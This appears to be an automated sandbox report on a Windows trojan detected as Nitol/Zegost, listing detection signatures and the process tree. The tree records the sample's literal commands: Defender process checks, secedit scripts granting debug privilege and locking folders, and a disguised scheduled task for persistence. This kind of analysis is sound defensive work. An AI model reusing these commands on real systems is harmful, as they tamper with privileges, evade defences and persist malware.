Windows Analysis Report
Lets-x64.exe

Overview

General Information

Sample name: Lets-x64.exe
Analysis ID: 1582022
MD5: a702cc254b31fbc4a5ec45fa16573521
SHA1: 85c6aff84ebee14d9df214f1760a6bd4975e49ec
SHA256: 887cf0ade18f096b4828e224f7f8a9fd2297c9fff930134e676af8b4d99455b9
Tags: exe, user-aachum

Detection

Nitol, Zegost
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
Yara detected Zegost
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to modify Windows User Account Control (UAC) settings
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Encrypted powershell cmdline option found
Found stalling execution ending in API Sleep call
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • Lets-x64.exe (PID: 4500 cmdline: "C:\Users\user\Desktop\Lets-x64.exe" MD5: A702CC254B31FBC4A5EC45FA16573521)
    • irsetup.exe (PID: 320 cmdline: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003" MD5: 2A7D5F8D3FB4AB753B226FD88D31453B)
      • powershell.exe (PID: 5620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=320').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;} MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2952 cmdline: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • _P18sPbB.exe (PID: 6104 cmdline: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" MD5: 3BAED7BF765E1631DAF431D29173213C)
          • powershell.exe (PID: 1088 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 3364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7396 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • powershell.exe (PID: 984 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7420 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • powershell.exe (PID: 5996 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7328 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • powershell.exe (PID: 2436 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • SecEdit.exe (PID: 7412 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
          • cmd.exe (PID: 7224 cmdline: cmd /c echo.>c:\inst.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7600 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7680 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
      • powershell.exe (PID: 7632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3560 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 984 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 8028 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2076 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 5308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 6540 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • iusb3mon.exe (PID: 7272 cmdline: C:\ProgramData\program\iusb3mon.exe MD5: 3BAED7BF765E1631DAF431D29173213C)
    • powershell.exe (PID: 7936 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SecEdit.exe (PID: 7676 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
    • powershell.exe (PID: 7944 cmdline: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SecEdit.exe (PID: 7648 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
    • powershell.exe (PID: 7960 cmdline: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
